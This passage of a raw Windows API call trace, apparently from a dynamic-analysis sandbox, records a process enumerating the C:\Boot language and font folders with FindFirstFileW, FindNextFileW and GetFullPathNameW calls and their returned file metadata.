dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.240] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.240] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.240] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.240] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0039.240] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.240] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.241] CoTaskMemFree (pv=0x4fe370) [0039.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.241] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0039.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.241] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0039.241] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0039.241] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.241] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.241] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.241] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.241] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.242] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.242] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0039.242] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0039.242] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.242] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.242] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.242] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.242] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.243] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0039.243] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.243] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.243] CoTaskMemFree (pv=0x4fe370) [0039.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.243] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0039.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.243] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0039.243] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0039.243] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.283] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.283] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0039.283] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0039.283] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0039.284] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0039.284] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0039.284] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.284] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.284] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\chs_boot.ttf", lpFilePart=0x0) returned 0x1a [0039.284] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\cht_boot.ttf", lpFilePart=0x0) returned 0x1a [0039.284] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\jpn_boot.ttf", lpFilePart=0x0) returned 0x1a [0039.284] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\kor_boot.ttf", lpFilePart=0x0) returned 0x1a [0039.284] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpFilePart=0x0) returned 0x1b [0039.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.285] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0039.285] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0039.285] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0039.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0039.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0039.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0039.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0039.286] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0039.286] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.286] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0039.286] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.286] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.286] CoTaskMemFree (pv=0x4fe370) [0039.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.286] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0039.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.286] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0039.286] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0039.286] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.308] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.308] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.309] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.309] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.309] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.309] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0039.309] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0039.309] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.309] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, 